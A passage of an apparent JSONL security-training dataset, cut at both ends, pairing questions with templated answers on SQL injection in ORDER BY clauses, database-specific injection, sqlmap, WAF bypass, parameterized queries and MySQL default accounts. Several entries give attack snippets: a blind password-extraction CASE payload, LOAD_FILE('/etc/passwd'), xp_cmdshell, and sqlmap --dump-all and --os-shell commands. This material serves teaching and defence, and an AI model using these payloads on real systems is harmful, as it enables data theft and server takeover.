BY/GROUP BY?", "output": "Methods for detecting SQL Injection in ORDER BY/GROUP BY 
attacks or anomalies:\n\n- Non-column values in ORDER BY\n- CASE/IF statements in sorting\n- Numeric ORDER BY probing\n- Subqueries in ORDER BY/GROUP BY", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108961Z", "updated_at": "2025-12-17T19:35:42.108961Z"} +{"id": "trtp-88e147326b47", "instruction": "How can organizations protect against SQL Injection in ORDER BY/GROUP BY?", "output": "Security controls and preventive measures for SQL Injection in ORDER BY/GROUP BY:\n\n- Allowlist valid column names for sorting\n- Map user input to predefined sort options\n- Avoid dynamic ORDER BY construction\n- Validate sort direction (ASC/DESC only)\n\nORDER BY injection is often overlooked because developers assume sorting is safe. Since parameterization doesn't work here, allowlisting column names is required. 
Conditional CASE statements enable blind extraction.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.108988Z", "updated_at": "2025-12-17T19:35:42.108988Z"} +{"id": "trtp-6914e4fbe41c", "instruction": "Show an example of SQL Injection in ORDER BY/GROUP BY.", "output": "Example of SQL Injection in ORDER BY/GROUP BY:\n\n```sql\n-- Column enumeration: ORDER BY 1, ORDER BY 2, etc.\n-- Conditional extraction: ORDER BY (CASE WHEN (SELECT SUBSTRING(password,1,1)='a' FROM users LIMIT 1) THEN 1 ELSE 2 END)\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-in-order-by-group-by", "license": "original", "retrieved_at": "2025-12-17T19:35:42.108841Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.109000Z", "updated_at": "2025-12-17T19:35:42.109000Z"} +{"id": "trtp-9a163578518f", "instruction": "What is Database-Specific SQL Injection and why is it important for database security?", "output": "Each database has unique syntax, functions, and features that affect injection techniques. MySQL, MSSQL, PostgreSQL, and Oracle have different comment styles, string functions, and dangerous capabilities.\n\nSecurity Relevance: Database-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. 
Generic payloads often fail.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111244Z", "updated_at": "2025-12-17T19:35:42.111244Z"} +{"id": "trtp-02429b443fd5", "instruction": "What are the main parts of Database-Specific SQL Injection that security teams should understand?", "output": "Database-Specific SQL Injection consists of the following key components:\n\n- Comment syntax variations\n- String concatenation differences\n- System function differences\n- Dangerous built-in procedures\n- Information schema variations", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111265Z", "updated_at": "2025-12-17T19:35:42.111265Z"} +{"id": "trtp-62cfdae3c47c", "instruction": "How can Database-Specific SQL Injection lead to database security incidents?", "output": "Database-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. 
Generic payloads often fail.\n\nCommon attack vectors include:\n- MySQL: LOAD_FILE('/etc/passwd')\n- MSSQL: EXEC xp_cmdshell 'command'\n- Oracle: SELECT * FROM v$version\n- PostgreSQL: COPY (SELECT *) TO '/tmp/out'", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111280Z", "updated_at": "2025-12-17T19:35:42.111280Z"} +{"id": "trtp-dde369f6907f", "instruction": "What threats are associated with Database-Specific SQL Injection?", "output": "Attack techniques involving Database-Specific SQL Injection:\n\n- MySQL: LOAD_FILE('/etc/passwd')\n- MSSQL: EXEC xp_cmdshell 'command'\n- Oracle: SELECT * FROM v$version\n- PostgreSQL: COPY (SELECT *) TO '/tmp/out'\n\nDefenders can detect these attacks by:\n- Database-specific function patterns\n- Comment style analysis\n- System table access patterns", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111294Z", "updated_at": "2025-12-17T19:35:42.111294Z"} +{"id": "trtp-78e108ec3c61", "instruction": "How can security teams detect attacks related to Database-Specific SQL Injection?", "output": "Methods for detecting Database-Specific SQL Injection attacks or anomalies:\n\n- Database-specific function patterns\n- 
Comment style analysis\n- System table access patterns\n- Fingerprinting query attempts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111317Z", "updated_at": "2025-12-17T19:35:42.111317Z"} +{"id": "trtp-9c945f5afb6a", "instruction": "What preventive measures address Database-Specific SQL Injection vulnerabilities?", "output": "Security controls and preventive measures for Database-Specific SQL Injection:\n\n- Disable dangerous database features\n- Database-specific hardening guides\n- WAF with database-specific rules\n- Function/procedure access restrictions\n\nDatabase-specific knowledge enables targeted exploitation. MSSQL's xp_cmdshell provides OS access. Oracle's UTL_FILE reads files. MySQL's LOAD_FILE reads local files. 
Generic payloads often fail.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111329Z", "updated_at": "2025-12-17T19:35:42.111329Z"} +{"id": "trtp-4ec7faf55d1a", "instruction": "Show an example of Database-Specific SQL Injection.", "output": "Example of Database-Specific SQL Injection:\n\n```sql\n-- MySQL comment: #, -- , /**/\n-- MSSQL comment: --, /**/\n-- MySQL concat: CONCAT(a,b)\n-- MSSQL concat: a+b\n-- Oracle concat: a||b\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-database-specific-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.111215Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.111339Z", "updated_at": "2025-12-17T19:35:42.111339Z"} +{"id": "trtp-a3a64bf18fb5", "instruction": "How does SQL Injection Automation with sqlmap work and what are its security implications?", "output": "sqlmap is the premier SQL injection automation tool. It detects injection points, fingerprints databases, extracts data, and can achieve OS shell access. Understanding sqlmap helps both attackers and defenders.\n\nSecurity Relevance: sqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. 
Defending against sqlmap patterns is essential.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113399Z", "updated_at": "2025-12-17T19:35:42.113399Z"} +{"id": "trtp-b07bf12bfcbf", "instruction": "What are the main parts of SQL Injection Automation with sqlmap that security teams should understand?", "output": "SQL Injection Automation with sqlmap consists of the following key components:\n\n- Injection point detection\n- Database fingerprinting\n- Data extraction automation\n- Privilege escalation features\n- OS shell capabilities", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113418Z", "updated_at": "2025-12-17T19:35:42.113418Z"} +{"id": "trtp-3b2202043142", "instruction": "Why is SQL Injection Automation with sqlmap important for database security?", "output": "sqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. 
Defending against sqlmap patterns is essential.\n\nCommon attack vectors include:\n- Database enumeration: --dbs\n- Table dumping: --tables -D database\n- Data extraction: --dump -T users\n- OS shell: --os-shell", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113433Z", "updated_at": "2025-12-17T19:35:42.113433Z"} +{"id": "trtp-5588901ccf22", "instruction": "How do attackers abuse SQL Injection Automation with sqlmap?", "output": "Attack techniques involving SQL Injection Automation with sqlmap:\n\n- Database enumeration: --dbs\n- Table dumping: --tables -D database\n- Data extraction: --dump -T users\n- OS shell: --os-shell\n\nDefenders can detect these attacks by:\n- sqlmap User-Agent string\n- Systematic parameter fuzzing\n- Rapid sequential injection attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113448Z", "updated_at": "2025-12-17T19:35:42.113448Z"} +{"id": "trtp-7242020b1fef", "instruction": "How do you detect exploitation of SQL Injection Automation with sqlmap?", "output": "Methods for detecting SQL Injection Automation with sqlmap attacks or anomalies:\n\n- sqlmap User-Agent string\n- Systematic parameter 
fuzzing\n- Rapid sequential injection attempts\n- Known sqlmap payload patterns", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113460Z", "updated_at": "2025-12-17T19:35:42.113460Z"} +{"id": "trtp-7e13fffa83d9", "instruction": "What security controls mitigate SQL Injection Automation with sqlmap risks?", "output": "Security controls and preventive measures for SQL Injection Automation with sqlmap:\n\n- Rate limiting slows automation\n- Behavioral analysis for automated patterns\n- CAPTCHA on sensitive forms\n- Honeypot parameters\n\nsqlmap makes advanced injection accessible to less skilled attackers. It can dump entire databases, crack password hashes, and establish OS shells. 
Defending against sqlmap patterns is essential.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113492Z", "updated_at": "2025-12-17T19:35:42.113492Z"} +{"id": "trtp-3474483ad899", "instruction": "Show an example of SQL Injection Automation with sqlmap.", "output": "Example of SQL Injection Automation with sqlmap:\n\n```sql\n# Basic injection test:\nsqlmap -u 'http://site.com/page?id=1' --dbs\n\n# Full exploitation:\nsqlmap -u URL --dump-all\nsqlmap -u URL --os-shell\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-sql-injection-automation-with-sqlmap", "license": "original", "retrieved_at": "2025-12-17T19:35:42.113362Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.113505Z", "updated_at": "2025-12-17T19:35:42.113505Z"} +{"id": "trtp-fbcbecce67ce", "instruction": "Explain WAF Bypass for SQL Injection from a security perspective.", "output": "Web Application Firewalls attempt to block SQL injection but can be bypassed through encoding, alternative syntax, and filter evasion. Understanding bypass techniques helps both penetration testers and WAF administrators.\n\nSecurity Relevance: WAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. 
Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115779Z", "updated_at": "2025-12-17T19:35:42.115779Z"} +{"id": "trtp-6155aa926f75", "instruction": "What elements make up WAF Bypass for SQL Injection?", "output": "WAF Bypass for SQL Injection consists of the following key components:\n\n- URL encoding variations\n- Comment-based bypasses\n- Whitespace alternatives\n- Case manipulation\n- Function alternatives", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115799Z", "updated_at": "2025-12-17T19:35:42.115799Z"} +{"id": "trtp-53d6bf028a90", "instruction": "From a security perspective, why should defenders understand WAF Bypass for SQL Injection?", "output": "WAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. 
Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.\n\nCommon attack vectors include:\n- Comment insertion: UN/**/ION SEL/**/ECT\n- Double URL encoding: %252F for /\n- Case variation: sElEcT\n- Alternative whitespace: %09, %0a, %0d", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115814Z", "updated_at": "2025-12-17T19:35:42.115814Z"} +{"id": "trtp-4b133f6ef683", "instruction": "What attacks exploit WAF Bypass for SQL Injection?", "output": "Attack techniques involving WAF Bypass for SQL Injection:\n\n- Comment insertion: UN/**/ION SEL/**/ECT\n- Double URL encoding: %252F for /\n- Case variation: sElEcT\n- Alternative whitespace: %09, %0a, %0d\n\nDefenders can detect these attacks by:\n- Multiple encoding detection\n- Normalized input analysis\n- Comment pattern detection", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115828Z", "updated_at": "2025-12-17T19:35:42.115828Z"} +{"id": "trtp-1940eae9e0b1", "instruction": "What should analysts look for when monitoring for WAF Bypass for SQL Injection?", "output": "Methods for detecting WAF Bypass for SQL Injection attacks or anomalies:\n\n- 
Multiple encoding detection\n- Normalized input analysis\n- Comment pattern detection\n- Non-standard whitespace", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115856Z", "updated_at": "2025-12-17T19:35:42.115856Z"} +{"id": "trtp-2c6a16fc004e", "instruction": "What preventive measures address WAF Bypass for SQL Injection vulnerabilities?", "output": "Security controls and preventive measures for WAF Bypass for SQL Injection:\n\n- Recursive decoding before analysis\n- Normalize case before matching\n- Block all comment sequences\n- Parameterized queries as primary defense\n\nWAFs provide defense-in-depth but shouldn't be the only protection. Skilled attackers routinely bypass WAFs. 
Understanding bypass techniques helps configure WAFs better and emphasizes the need for parameterized queries.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115868Z", "updated_at": "2025-12-17T19:35:42.115868Z"} +{"id": "trtp-6942c962321d", "instruction": "What does WAF Bypass for SQL Injection look like in SQL?", "output": "Example of WAF Bypass for SQL Injection:\n\n```sql\n-- Comment insertion: SEL/**/ECT * FROM users\n-- Case variation: sElEcT * fRoM users\n-- Encoding: %53%45%4C%45%43%54\n-- Whitespace: SELECT%09*%09FROM%09users\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-waf-bypass-for-sql-injection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.115737Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.115898Z", "updated_at": "2025-12-17T19:35:42.115898Z"} +{"id": "trtp-d270c65b527f", "instruction": "What is Parameterized Queries and Prepared Statements and why is it important for database security?", "output": "Parameterized queries (prepared statements) are the primary defense against SQL injection. They separate SQL code from data, ensuring user input is always treated as data, never as executable code.\n\nSecurity Relevance: Parameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. 
No amount of malicious input can alter query logic when properly parameterized.", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118067Z", "updated_at": "2025-12-17T19:35:42.118067Z"} +{"id": "trtp-5c07420e5e9f", "instruction": "Describe the technical aspects of Parameterized Queries and Prepared Statements.", "output": "Parameterized Queries and Prepared Statements consists of the following key components:\n\n- Query preparation phase\n- Parameter binding\n- Type enforcement\n- Query plan caching\n- ORM parameterization", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118089Z", "updated_at": "2025-12-17T19:35:42.118089Z"} +{"id": "trtp-279a6ca908be", "instruction": "From a security perspective, why should defenders understand Parameterized Queries and Prepared Statements?", "output": "Parameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. 
No amount of malicious input can alter query logic when properly parameterized.\n\nCommon attack vectors include:\n- Second-order injection (if output used unsafely)\n- Dynamic SQL within stored procedures\n- ORDER BY (can't parameterize columns)\n- Table/column name injection", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118103Z", "updated_at": "2025-12-17T19:35:42.118103Z"} +{"id": "trtp-591e83d371a1", "instruction": "What attacks exploit Parameterized Queries and Prepared Statements?", "output": "Attack techniques involving Parameterized Queries and Prepared Statements:\n\n- Second-order injection (if output used unsafely)\n- Dynamic SQL within stored procedures\n- ORDER BY (can't parameterize columns)\n- Table/column name injection\n\nDefenders can detect these attacks by:\n- Code review for string concatenation\n- Static analysis for unsafe query patterns\n- ORM configuration verification", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118117Z", "updated_at": "2025-12-17T19:35:42.118117Z"} +{"id": "trtp-3914eb4ff4d1", "instruction": "What log entries indicate Parameterized Queries and Prepared Statements 
attacks?", "output": "Methods for detecting Parameterized Queries and Prepared Statements attacks or anomalies:\n\n- Code review for string concatenation\n- Static analysis for unsafe query patterns\n- ORM configuration verification\n- Dynamic SQL in stored procedures", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118129Z", "updated_at": "2025-12-17T19:35:42.118129Z"} +{"id": "trtp-469e95a88e4e", "instruction": "What security controls mitigate Parameterized Queries and Prepared Statements risks?", "output": "Security controls and preventive measures for Parameterized Queries and Prepared Statements:\n\n- Use parameterized queries for all user input\n- ORM frameworks with proper configuration\n- Allowlist validation for dynamic identifiers\n- Code review for parameterization completeness\n\nParameterized queries eliminate SQL injection at the root cause. The database processes the query structure separately from values. 
No amount of malicious input can alter query logic when properly parameterized.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118141Z", "updated_at": "2025-12-17T19:35:42.118141Z"} +{"id": "trtp-16ab4a28c53b", "instruction": "Provide a code example for Parameterized Queries and Prepared Statements.", "output": "Example of Parameterized Queries and Prepared Statements:\n\n```sql\n-- Vulnerable: cursor.execute(f\"SELECT * FROM users WHERE id = {user_id}\")\n-- Safe: cursor.execute(\"SELECT * FROM users WHERE id = %s\", (user_id,))\n\n-- Java PreparedStatement:\nPreparedStatement stmt = conn.prepareStatement(\"SELECT * FROM users WHERE id = ?\");\nstmt.setInt(1, userId);\n```", "category": "attack_techniques", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-sql_injection-parameterized-queries-and-prepared-statements", "license": "original", "retrieved_at": "2025-12-17T19:35:42.118001Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.118152Z", "updated_at": "2025-12-17T19:35:42.118152Z"} +{"id": "trtp-0f0637bf6578", "instruction": "Explain MySQL Default Accounts and Authentication from a security perspective.", "output": "MySQL installations include default accounts that are frequently misconfigured. 
The root account, anonymous users, and test databases present immediate security risks if not properly secured during installation.\n\nSecurity Relevance: Default MySQL configurations are insecure. Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. mysql_secure_installation addresses common issues but is often skipped.", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120279Z", "updated_at": "2025-12-17T19:35:42.120279Z"} +{"id": "trtp-b94f3495a2d8", "instruction": "What elements make up MySQL Default Accounts and Authentication?", "output": "MySQL Default Accounts and Authentication consists of the following key components:\n\n- root account without password\n- Anonymous user accounts\n- Remote root access\n- mysql.user table\n- Authentication plugins", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120309Z", "updated_at": "2025-12-17T19:35:42.120309Z"} +{"id": "trtp-942db21a558c", "instruction": "From a security perspective, why should defenders understand MySQL Default Accounts and Authentication?", "output": "Default MySQL configurations are insecure. 
Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. mysql_secure_installation addresses common issues but is often skipped.\n\nCommon attack vectors include:\n- Connect as root without password\n- Anonymous user access\n- Remote root login attempts\n- mysql.user table enumeration", "category": "database_security", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120323Z", "updated_at": "2025-12-17T19:35:42.120323Z"} +{"id": "trtp-475b2e506675", "instruction": "How do attackers abuse MySQL Default Accounts and Authentication?", "output": "Attack techniques involving MySQL Default Accounts and Authentication:\n\n- Connect as root without password\n- Anonymous user access\n- Remote root login attempts\n- mysql.user table enumeration\n\nDefenders can detect these attacks by:\n- Failed authentication attempts\n- Anonymous user connections\n- Remote root connection attempts", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120352Z", "updated_at": "2025-12-17T19:35:42.120352Z"} +{"id": "trtp-9ab597a13dcc", "instruction": "What indicators reveal malicious activity involving MySQL Default Accounts and Authentication?", "output": 
"Methods for detecting MySQL Default Accounts and Authentication attacks or anomalies:\n\n- Failed authentication attempts\n- Anonymous user connections\n- Remote root connection attempts\n- mysql.user access from non-admin accounts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-mysql-mysql-default-accounts-and-authentication", "license": "original", "retrieved_at": "2025-12-17T19:35:42.120239Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.120380Z", "updated_at": "2025-12-17T19:35:42.120380Z"} +{"id": "trtp-f949ea696588", "instruction": "What security controls mitigate MySQL Default Accounts and Authentication risks?", "output": "Security controls and preventive measures for MySQL Default Accounts and Authentication:\n\n- Run mysql_secure_installation\n- Set strong root password\n- Remove anonymous accounts\n- Disable remote root access\n\nDefault MySQL configurations are insecure. Root without password allows immediate database takeover. Anonymous accounts enable unauthorized access. 
